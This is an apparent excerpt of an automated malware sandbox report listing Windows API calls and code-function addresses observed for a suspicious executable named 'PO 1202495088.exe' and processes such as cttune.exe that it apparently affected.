                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02AC0 NtEnumerateValueKey,LdrInitializeThunk,13_2_04A02AC0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02A10 NtWriteFile,LdrInitializeThunk,13_2_04A02A10
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02B80 NtCreateKey,LdrInitializeThunk,13_2_04A02B80
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02B90 NtFreeVirtualMemory,LdrInitializeThunk,13_2_04A02B90
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02BC0 NtQueryInformationToken,LdrInitializeThunk,13_2_04A02BC0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02B00 NtQueryValueKey,LdrInitializeThunk,13_2_04A02B00
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02B10 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_04A02B10
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A034E0 NtCreateMutant,LdrInitializeThunk,13_2_04A034E0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A04570 NtSuspendThread,13_2_04A04570
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A04260 NtSetContextThread,13_2_04A04260
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02CD0 NtEnumerateKey,13_2_04A02CD0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02C20 NtSetInformationFile,13_2_04A02C20
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02C10 NtOpenProcess,13_2_04A02C10
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02C50 NtUnmapViewOfSection,13_2_04A02C50
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02DA0 NtReadVirtualMemory,13_2_04A02DA0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02DC0 NtAdjustPrivilegesToken,13_2_04A02DC0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02D50 NtWriteVirtualMemory,13_2_04A02D50
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02EB0 NtProtectVirtualMemory,13_2_04A02EB0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02E80 NtCreateProcessEx,13_2_04A02E80
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02EC0 NtQuerySection,13_2_04A02EC0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02ED0 NtResumeThread,13_2_04A02ED0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02E00 NtQueueApcThread,13_2_04A02E00
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02FB0 NtSetValueKey,13_2_04A02FB0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02F30 NtOpenDirectoryObject,13_2_04A02F30
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A029D0 NtWaitForSingleObject,13_2_04A029D0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02AA0 NtQueryInformationFile,13_2_04A02AA0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02BE0 NtQueryVirtualMemory,13_2_04A02BE0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A02B20 NtQueryInformationProcess,13_2_04A02B20
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A03C90 NtOpenThread,13_2_04A03C90
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A03C30 NtOpenProcessToken,13_2_04A03C30
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A038D0 NtGetContextThread,13_2_04A038D0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CEEDD6 NtQueryInformationProcess,NtReadVirtualMemory,13_2_04CEEDD6
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CF46E8 NtUnmapViewOfSection,13_2_04CF46E8
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CF3618 NtSuspendThread,13_2_04CF3618
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CF3308 NtSetContextThread,13_2_04CF3308
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CF431D NtMapViewOfSection,13_2_04CF431D
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CF3C38 NtQueueApcThread,13_2_04CF3C38
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CEEDD8 NtQueryInformationProcess,13_2_04CEEDD8
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CEF903 NtResumeThread,13_2_04CEF903
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CF3928 NtResumeThread,13_2_04CF3928
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E50E81_2_030E50E8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030EDF081_2_030EDF08
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E5F681_2_030E5F68
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E3E001_2_030E3E00
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E46B01_2_030E46B0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030EB5BE1_2_030EB5BE
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030EBC381_2_030EBC38
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030ECC5B1_2_030ECC5B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E04E81_2_030E04E8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E4B481_2_030E4B48
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E82481_2_030E8248
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E82581_2_030E8258
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E32A01_2_030E32A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030ED16B1_2_030ED16B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E11F81_2_030E11F8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030EC0231_2_030EC023
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E203B1_2_030E203B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030EC0301_2_030EC030
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E80411_2_030E8041
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E80501_2_030E8050
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030EB8E81_2_030EB8E8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030EB8F81_2_030EB8F8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E6E391_2_030E6E39
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030EB6301_2_030EB630
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E6E481_2_030E6E48
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E5E501_2_030E5E50
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E5E801_2_030E5E80
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E86B81_2_030E86B8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030ED6F81_2_030ED6F8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E3D601_2_030E3D60
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030EBC281_2_030EBC28
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E6C501_2_030E6C50
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E84D91_2_030E84D9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_030E84E81_2_030E84E8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_075F73801_2_075F7380
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_075F60701_2_075F6070
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_075F4C681_2_075F4C68
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_075F48301_2_075F4830
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_075F64981_2_075F6498
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 1_2_075F64A81_2_075F64A8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_00401C664_2_00401C66
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_00418D334_2_00418D33
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_004030454_2_00403045
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_004030504_2_00403050
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0040E8EA4_2_0040E8EA
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0040E8F34_2_0040E8F3
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0040296B4_2_0040296B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_004029704_2_00402970
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_00404A474_2_00404A47
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0042F2B34_2_0042F2B3
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_004014404_2_00401440
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_004034204_2_00403420
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0041056A4_2_0041056A
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_004105734_2_00410573
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_004025C64_2_004025C6
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_004025D04_2_004025D0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_00402E2E4_2_00402E2E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_00402E304_2_00402E30
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_00416F1E4_2_00416F1E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_00416F234_2_00416F23
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_004107934_2_00410793
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0040E79A4_2_0040E79A
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0040E7A34_2_0040E7A3
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0148010E4_2_0148010E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0146E0764_2_0146E076
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B00A04_2_013B00A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013CE3104_2_013CE310
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0148A5264_2_0148A526
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C04454_2_013C0445
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014767574_2_01476757
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013CA7604_2_013CA760
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C27604_2_013C2760
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DC6004_2_013DC600
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E46704_2_013E4670
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147A6C04_2_0147A6C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C06804_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BC6E04_2_013BC6E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BE9A04_2_013BE9A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147E9A64_2_0147E9A6
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EE8104_2_013EE810
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013A68684_2_013A6868
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014608354_2_01460835
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D68824_2_013D6882
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0145C89F4_2_0145C89F
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C28C04_2_013C28C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0B104_2_013C0B10
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01434BC04_2_01434BC0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147EA5B4_2_0147EA5B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147CA134_2_0147CA13
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01462AC04_2_01462AC0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BAD004_2_013BAD00
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0D694_2_013C0D69
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D2DB04_2_013D2DB0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0146EC4C4_2_0146EC4C
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013CAC204_2_013CAC20
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147EC604_2_0147EC60
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B0C124_2_013B0C12
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01476C694_2_01476C69
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143EC204_2_0143EC20
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0148ACEB4_2_0148ACEB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D8CDF4_2_013D8CDF
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013CCF004_2_013CCF00
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C6FE04_2_013C6FE0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147EFBF4_2_0147EFBF
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01402E484_2_01402E48
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01460E6D4_2_01460E6D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E0E504_2_013E0E50
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B2EE84_2_013B2EE8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01470EAD4_2_01470EAD
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AF1134_2_013AF113
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0140717A4_2_0140717A
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0145D1304_2_0145D130
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DB1E04_2_013DB1E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C51C04_2_013C51C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F508C4_2_013F508C
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014770F14_2_014770F1
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013CB0D04_2_013CB0D0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147F3304_2_0147F330
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B13804_2_013B1380
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147124C4_2_0147124C
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AD2EC4_2_013AD2EC
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014775C64_2_014775C6
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147F5C94_2_0147F5C9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142D4804_2_0142D480
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014554904_2_01455490
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0146D6464_2_0146D646
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014616234_2_01461623
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0145D62C4_2_0145D62C
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014336EC4_2_014336EC
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147F6F64_2_0147F6F6
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014059C04_2_014059C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014358704_2_01435870
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147F8724_2_0147F872
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C38004_2_013C3800
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C98704_2_013C9870
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DB8704_2_013DB870
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014718DA4_2_014718DA
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014778F34_2_014778F3
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014398B24_2_014398B2
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013FDB194_2_013FDB19
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147FB2E4_2_0147FB2E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01451B804_2_01451B80
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DFAA04_2_013DFAA0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147FA894_2_0147FA89
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01477D4C4_2_01477D4C
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147FD274_2_0147FD27
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0145FDF44_2_0145FDF4
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C9DD04_2_013C9DD0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C3C604_2_013C3C60
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01447CE84_2_01447CE8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DFCE04_2_013DFCE0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01459C984_2_01459C98
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143FF404_2_0143FF40
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147FF634_2_0147FF63
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01471FC64_2_01471FC6
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01463FA04_2_01463FA0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C1EB24_2_013C1EB2
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01479ED24_2_01479ED2
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 12_2_006A90F812_2_006A90F8
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 12_2_006A95AC12_2_006A95AC
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 12_2_006A867812_2_006A8678
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 12_2_006A921312_2_006A9213
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049D044513_2_049D0445
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A9A52613_2_04A9A526
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049D068013_2_049D0680
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A8A6C013_2_04A8A6C0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049CC6E013_2_049CC6E0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049EC60013_2_049EC600
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049F467013_2_049F4670
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049D276013_2_049D2760
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049DA76013_2_049DA760
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A8675713_2_04A86757
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049C00A013_2_049C00A0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A7E07613_2_04A7E076
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A9010E13_2_04A9010E
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049DE31013_2_049DE310
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049E8CDF13_2_049E8CDF
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A9ACEB13_2_04A9ACEB
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A4EC2013_2_04A4EC20
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049C0C1213_2_049C0C12
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049DAC2013_2_049DAC20
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A86C6913_2_04A86C69
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A8EC6013_2_04A8EC60
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A7EC4C13_2_04A7EC4C
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049E2DB013_2_049E2DB0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049CAD0013_2_049CAD00
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049D0D6913_2_049D0D69
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A80EAD13_2_04A80EAD
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049C2EE813_2_049C2EE8
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A70E6D13_2_04A70E6D
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049F0E5013_2_049F0E50
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A12E4813_2_04A12E48
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A8EFBF13_2_04A8EFBF
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049D6FE013_2_049D6FE0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049DCF0013_2_049DCF00
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049E688213_2_049E6882
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A6C89F13_2_04A6C89F
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049D28C013_2_049D28C0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049FE81013_2_049FE810
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A7083513_2_04A70835
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049B686813_2_049B6868
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A8E9A613_2_04A8E9A6
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049CE9A013_2_049CE9A0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A72AC013_2_04A72AC0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A8CA1313_2_04A8CA13
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A8EA5B13_2_04A8EA5B
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A44BC013_2_04A44BC0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049D0B1013_2_049D0B10
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A3D48013_2_04A3D480
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A6549013_2_04A65490
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A8F5C913_2_04A8F5C9
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A875C613_2_04A875C6
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A436EC13_2_04A436EC
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A8F6F613_2_04A8F6F6
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A7162313_2_04A71623
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A6D62C13_2_04A6D62C
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A7D64613_2_04A7D646
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A0508C13_2_04A0508C
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049DB0D013_2_049DB0D0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A870F113_2_04A870F1
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049D51C013_2_049D51C0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049EB1E013_2_049EB1E0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049BF11313_2_049BF113
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A6D13013_2_04A6D130
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A1717A13_2_04A1717A
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049BD2EC13_2_049BD2EC
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A8124C13_2_04A8124C
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049C138013_2_049C1380
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A8F33013_2_04A8F330
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A69C9813_2_04A69C98
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A57CE813_2_04A57CE8
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049EFCE013_2_049EFCE0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049D3C6013_2_049D3C60
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049D9DD013_2_049D9DD0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A6FDF413_2_04A6FDF4
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A8FD2713_2_04A8FD27
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A87D4C13_2_04A87D4C
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049D1EB213_2_049D1EB2
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A89ED213_2_04A89ED2
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A81FC613_2_04A81FC6
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A8FF6313_2_04A8FF63
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A4FF4013_2_04A4FF40
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A498B213_2_04A498B2
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A878F313_2_04A878F3
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A818DA13_2_04A818DA
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049D380013_2_049D3800
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A4587013_2_04A45870
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A8F87213_2_04A8F872
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049D987013_2_049D9870
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049EB87013_2_049EB870
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A159C013_2_04A159C0
